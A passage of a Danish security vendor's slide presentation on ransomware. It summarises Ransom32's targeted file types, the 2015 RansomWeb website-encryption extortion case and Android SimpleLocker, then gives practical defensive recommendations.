*.potm, *.ppam, *.ppsx, *.ppsm, *.sldx, *.sldm, *.wav, *.mp3, *.aif, *.iff, *.m3u, *.m4u, *.mid, *.mpa, *.wma, *.ra, *.avi, *.mov, *.mp4, *.3gp, *.mpeg, *.3g2, *.asf, *.asx, *.flv, *.mpg, *.wmv, *.vob, *.m3u8, *.csv, *.efx, *.sdf, *.vcf, *.xml, *.ses, *.dat The malware will not attempt to encrypt any files if they are located in a directory that contains any of the following strings: :\windows\ :\winnt\ programdata\ boot\ temp\ tmp\ $recycle.bin\ Ransom32 A web interface allows you to see how many systems the malware has infected, how many Bitcoins it earned and allows you to further customize the malware The ransom note displayed by the malware Ransomweb Ransomweb that encrypts websites and web servers • High-Tech Bridge: • • • • • • In December 2014, our security experts discovered a very interesting case of a financial company website compromise: the website was out of service displaying a database error, while the website owner got an email asking for a ransom to “decrypt the database”. Web application in question was pretty simple and small, but very important for business of the company that could not afford to suspend it, neither to announce its compromise. Careful investigation that we performed revealed the following: The web application was compromised six months ago, several server scripts were modified to encrypt data before inserting it into the database, and to decrypt after getting data from the database. A sort of “on-fly” patching invisible to web application users. Only the most critical fields of the database tables were encrypted (probably not to impact web application performance a lot). All previously existing database records were encrypted accordingly. Encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by various traffic monitoring systems). During six months, hackers were silently waiting, while backups were being overwritten by the recent versions of the database. At the day X, hackers removed the key from the remote server. Database became unusable, website went out of service, and hackers demanded a ransom for the encryption key. RansomWeb: Crooks Start Encrypting Websites And Demanding Thousands Of Dollars From Businesses Thomas Fox-Brewster Jan 28, 2015 @ 07:36 AM In another startling development in the world of cyber crime, malicious hackers have started taking over website servers, encrypting the data on them and demanding payment to unlock the files. A large European financial services company, whose name was not disclosed, was the first known victim of this potentially businessdestroying attack, according to Swiss security firm High-Tech Bridge, which investigated the breach in December 2014. The security firm labelled the attack RansomWeb. The brazen techniques used and the high ransom represent a more aggressive take on ransomware – malware which encrypted people’s PCs and asked for payment, typically between $100 and £1,000. Though only a handful of attacks have been seen, many expect such extortion to grow rapidly in 2015. The initial attack started six months’ prior to the victim’s website being shut down by the hackers, who were surreptitiously locking up the most critical data on the server using “on-the-fly” tweaks to the site’s PHP code functions. The criminals stored the key to decrypt the data on their own remote web server accessible only via HTTPS encrypted communications, supposed to guarantee no one with visibility on those connections could get access to the data but them. As soon as they pulled the key and data was no longer being silently encrypted and decrypted, the website was knocked out of action. That’s when employees at the financial services firm were sent emails from a Gmail account, demanding the firm pay $50,000 to get their website back. They threatened to increase the price by 10 per cent with every passing week. http://www.forbes.com/sites/thomasbrewster/20 15/01/28/ransomweb-50000-dollar-extortion/ Android SimpleLocker • May 2014 – Simplelocker appears in Ukraine • Asks for $22 USD using Monexy • Uses TOR for C&C • Checks SD card for: • jpeg, jpg, png, bmp, gif, pdf, doc, docx, txt, avi, mkv, 3gp, mp4 • Unlike Cryptolocker, Encryption key is hardcoded on the malware. Encrypted files are appended with “.enc”. Anbefalinger Anbefalinger Awareness Bassale kontroller Opdateringer Rettigheder Backup Forberedelse Sandbox – emuleret afvikling • De indsamlede data kan afprøves i en sandbox for at verificere om de er skadelige. • Vil afsløre exploits, download af yderligere malware og call back. • Mistænkelig adfærd eller trafik bliver synlig. Virtual Analysis • Win 7 • Office10 • Adobe 11 • Win XP • Office07 • Adobe 10 • Windows Server Hvad kan vi gøre? - Praktiske anbefalinger (1) • Sikkerhed i dybden: Anvend forskellige og overlappende sikkerhedsforanstaltninger, så der beskyttes med single-point-of-failure i enkelte foranstaltninger eller teknologier • Basale kontroller: Hold fokus på basale kontroller – husk den løbende opfølgning • Overvågning: Mange organisationer opdager først brud på sikkerheden, når de får et opkald fra politiet eller en kunde. Overvågning af logfiler og change management kan give tidligere advarsel • Antivirus er ikke nok: Antivirus fanger stadig mange angreb, men I oplever også mange angreb med unik malware og udnyttelse af dag-0-sårbarheder, som kræver andre værktøjer • Endpointbeskyttelse: Endpoints skal beskyttes af mere end antivirus - husk opdateringer, begrænsede rettigheder, websikkerhed, device kontrol • Patch straks: Angribere får ofte adgang ved hjælp af simple angrebsmetoder, som man kan beskytte sig mod med et opdateret og godt konfigureret it-miljø samt opdateret anti-virus • Krypter følsomme data: Hvis data bliver tabt eller stjålet, er det meget sværere for en kriminel at misbruge • Beskyt krypteringsnøgler: Hvis krypteringsnøglerne kompromitteres, kompromitteres sikkerheden også • To-faktor-autentifikation: Dette vil ikke eliminere risikoen for, at passwords bliver stjålet, men det kan begrænse de skader, der kan ske ved misbrug af stjålne legitimationsoplysninger Hvad kan vi gøre? - Praktiske anbefalinger (2) • Mennesker: Awareness er stadig vigtigt. Undervis dine ansatte i vigtigheden af sikkerhed, hvordan man opdager et angreb, og hvad de skal gøre, når de ser noget mistænkeligt • Hold adgangen til data på et ”need-to-know” niveau: Begræns adgangen til systemerne til det nødvendige personale. Sørg for, at have processer på plads til at lukke for adgangen igen, når folk skifter rolle eller job • Husk fysisk sikkerhed: Ikke alle datatyverier sker online. Kriminelle vil manipulere med computere, betalingsterminaler eller stjæle dokumenter • Backup: Hvis alle andre foranstaltninger fejler, kan en backup redde data. Husk beskyttelse af backup medierne… • Incident response: Planlæg efter, at der vil ske hændelser - følg løbende op på hvordan, og hvor hurtigt, incidents opdages og håndteres, så reaktionen løbende kan forbedres • Opfølgning: Glem ikke de basale kontroller. Hold fokus på bedre og hurtigere opdagelse gennem en blanding af mennesker, processer og teknologi • Trusselsbilledet: Hold øje med trusselsbilledet for løbende at kunne tilpasse sikkerhedsløsningen. Husk at ”one-size fits all” ikke holder i virkeligheden • Riskovurdering: Er du mål for egentlig spionage, så undervurder ikke vedholdenheden, ekspertisen og værktøjerne hos din modstander Risikobegrænsning • Risikoen kan ikke fjernes, kun begrænses • Sikkerhed kan ikke købes som produkt • Sikkerhed opnås ved en blanding af • Procedure & ledelse (Management issues) • Design, værktøjer og tekniske løsninger • Løbende overvågning og vedligeholdelse • Resultat: Formulering af sikkerhedspolitik og implementering af sikkerhedssystem Hold dig opdateret Abonnér på Dubex’ nyhedsbrev Besøg www.dubex.dk www.dubex.dk/update/ Følg Dubex på LinkedIn & Twitter Deltag på Dubex’ arrangementer twitter.com/Dubex www.linkedin.com/company/dubex-as http://www.dubex.dk/arrangementer/ Tak!